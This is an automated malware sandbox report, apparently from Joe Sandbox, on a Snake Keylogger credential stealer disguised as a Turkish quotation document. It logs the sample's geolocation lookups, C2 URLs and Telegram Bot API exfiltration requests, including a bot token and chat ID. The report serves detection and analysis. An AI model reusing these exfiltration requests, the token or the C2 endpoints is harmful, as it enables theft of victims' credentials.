Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BF471h	4_2_059BF1C8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BEBC1h	4_2_059BE918
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059B31E8h	4_2_059B3116
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059B2C21h	4_2_059B2970
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BF019h	4_2_059BED70
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BE769h	4_2_059BE4C0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BDEB9h	4_2_059BDC10
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_059B0040
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BE311h	4_2_059BE068
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BDA61h	4_2_059BD7B8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BD1B1h	4_2_059BCF08
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059B0D0Dh	4_2_059B0B30
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059B1697h	4_2_059B0B30
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BD609h	4_2_059BD360
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BF8C9h	4_2_059BF620
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059BFD21h	4_2_059BFA78

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49728 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49727 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:38:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3291d7f9c807Host: api.telegram.orgContent-Length: 573

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49708 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49726 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49710 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:38:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3291d7f9c807Host: api.telegram.orgContent-Length: 573

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 18:10:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1451701321.0000000002772000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	String found in binary or memory: http://tempuri.org/DataSet2.xsd
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	String found in binary or memory: https://git.io/vblQ0
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_00C23E40	1_2_00C23E40
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_00C2E504	1_2_00C2E504
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_00C27288	1_2_00C27288
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_069A9498	1_2_069A9498
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_069A948B	1_2_069A948B
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_069A8D00	1_2_069A8D00
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A3D6C0	1_2_06A3D6C0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A37F20	1_2_06A37F20
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A3CF50	1_2_06A3CF50
